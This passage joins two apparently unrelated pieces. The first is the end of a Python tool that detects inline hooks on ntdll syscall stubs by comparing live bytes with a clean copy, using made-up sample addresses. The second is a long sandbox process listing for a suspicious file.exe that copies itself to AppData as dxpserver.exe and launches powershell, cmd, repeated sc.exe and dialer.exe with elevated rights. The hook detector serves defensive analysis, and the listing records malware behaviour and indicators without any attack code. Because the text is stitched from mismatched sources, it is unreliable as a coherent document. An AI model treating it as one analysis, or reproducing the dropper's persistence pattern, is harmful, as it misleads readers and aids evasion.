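        n = min(len(live_code), len(clean_code))
        if live_code[:n] == clean_code[:n]:
            continue                                 # prologue untouched
        kind, target = classify_prologue(live_code, base + rva)
        ckind, cval = classify_prologue(clean_code)  # recover SSN from the clean copy
        findings.append({"name": name, "rva": rva, "kind": kind, "target": target,
                         "ssn": cval if ckind == "syscall stub" else None})
    return findings


# Constructed sample: assumed ntdll base, made-up export RVAs, and clean Win10 x64 stub
# prefixes (mov r10,rcx; mov eax,SSN; test byte ptr [7FFE0308h],1) with illustrative SSNs.
NTDLL_BASE = 0x7FFB12340000
CLEAN = {
    "NtClose":                  (0x9D260, bytes.fromhex("4C8BD1B80F000000F604250803FE7F01")),
    "NtQueryDirectoryFile":     (0x9D540, bytes.fromhex("4C8BD1B835000000F604250803FE7F01")),
    "NtQuerySystemInformation": (0x9D3A0, bytes.fromhex("4C8BD1B836000000F604250803FE7F01")),
}
# Live view: the report's 6 hook bytes overwrite the start of two stubs; NtClose is untouched.
LIVE = {
    "NtClose": CLEAN["NtClose"],
    "NtQueryDirectoryFile": (0x9D540, REPORT_HOOKS["NtQueryDirectoryFile"]
                             + CLEAN["NtQueryDirectoryFile"][1][6:]),
    "NtQuerySystemInformation": (0x9D3A0, REPORT_HOOKS["NtQuerySystemInformation"]
                                 + CLEAN["NtQuerySystemInformation"][1][6:]),
}

if __name__ == "__main__":
    for f in find_hooks(LIVE, CLEAN, NTDLL_BASE):
        print("%-26s %-18s -> 0x%x (clean SSN %s)" % (f["name"], f["kind"], f["target"], f["ssn"]))
```

On a real host the live bytes come from ReadProcessMemory on the target's ntdll mapping, the clean bytes from a fresh file mapping of System32\ntdll.dll, and the RVAs from its export directory; the jump target resolved here is where to start looking for the injected hook code, and a target outside any loaded module's image range is itself a strong signal.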
Target ID: | 0 |
Start time: | 13:29:07 |
Start date: | 09/06/2023 |
Path: | C:\Users\user\Desktop\file.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66b520000 |
File size: | 10264640 bytes |
MD5 hash: | EEE7B971E0B76A0DF56BDAC2AC2FA343 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Target ID: | 1 |
Start time: | 13:29:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7466a0000 |
File size: | 447488 bytes |
MD5 hash: | 95000560239032BC68B4C2FDFCDEF913 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |
Target ID: | 2 |
Start time: | 13:29:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 4 |
Start time: | 13:29:22 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7cb270000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 5 |
Start time: | 13:29:22 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 6 |
Start time: | 13:29:22 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 7 |
Start time: | 13:29:23 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 8 |
Start time: | 13:29:23 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 9 |
Start time: | 13:29:23 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 10 |
Start time: | 13:29:24 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 11 |
Start time: | 13:29:25 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\dialer.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60f5c0000 |
File size: | 36864 bytes |
MD5 hash: | 0EC74656A7F7667DD94C76081B111827 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 12 |
Start time: | 13:29:25 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7466a0000 |
File size: | 447488 bytes |
MD5 hash: | 95000560239032BC68B4C2FDFCDEF913 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Target ID: | 13 |
Start time: | 13:29:25 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 14 |
Start time: | 13:29:26 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\winlogon.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b23f0000 |
File size: | 677376 bytes |
MD5 hash: | F9017F2DC455AD373DF036F5817A8870 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 15 |
Start time: | 13:29:26 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\lsass.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c5470000 |
File size: | 57976 bytes |
MD5 hash: | 317340CD278A374BCEF6A30194557227 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 16 |
Start time: | 13:29:28 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 17 |
Start time: | 13:29:28 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 18 |
Start time: | 13:29:28 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\dwm.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66aed0000 |
File size: | 62464 bytes |
MD5 hash: | 70073A05B2B43FFB7A625708BB29E7C7 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 19 |
Start time: | 13:29:39 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\wbem\WMIADAP.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff639610000 |
File size: | 177664 bytes |
MD5 hash: | 9783D0765F31980950445DFD40DB15DA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 20 |
Start time: | 13:29:46 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 21 |
Start time: | 13:29:46 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 22 |
Start time: | 13:29:47 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 23 |
Start time: | 13:29:48 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Target ID: | 24 |
Start time: | 13:29:50 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 25 |
Start time: | 13:29:50 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 26 |
Start time: | 13:29:51 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 27 |
Start time: | 13:29:55 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 28 |
Start time: | 13:29:56 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 31 |
Start time: | 13:29:57 |
Start date: | 09/06/2023 |
Path: | C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff652aa0000 |
File size: | 10264640 bytes |
MD5 hash: | EEE7B971E0B76A0DF56BDAC2AC2FA343 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Antivirus matches: | |
Target ID: | 32 |
Start time: | 13:29:57 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 33 |
Start time: | 13:29:58 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 34 |
Start time: | 13:29:59 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 35 |
Start time: | 13:30:00 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 36 |
Start time: | 13:30:03 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 37 |
Start time: | 13:30:04 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 38 |
Start time: | 13:30:04 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7466a0000 |
File size: | 447488 bytes |
MD5 hash: | 95000560239032BC68B4C2FDFCDEF913 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Target ID: | 39 |
Start time: | 13:30:04 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 40 |
Start time: | 13:30:05 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 41 |
Start time: | 13:30:06 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 42 |
Start time: | 13:30:06 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 43 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7cb270000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 44 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6da640000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 45 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | true |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 46 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 47 |
Start time: | 13:30:08 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 48 |
Start time: | 13:30:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 49 |
Start time: | 13:30:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff603c50000 |
File size: | 51288 bytes |
MD5 hash: | 32569E403279B3FD2EDB7EBD036273FA |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Target ID: | 50 |
Start time: | 13:30:09 |
Start date: | 09/06/2023 |
Path: | C:\Windows\System32\sc.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6a9a90000 |
File size: | 69120 bytes |
MD5 hash: | D79784553A9410D15E04766AAAB77CD6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |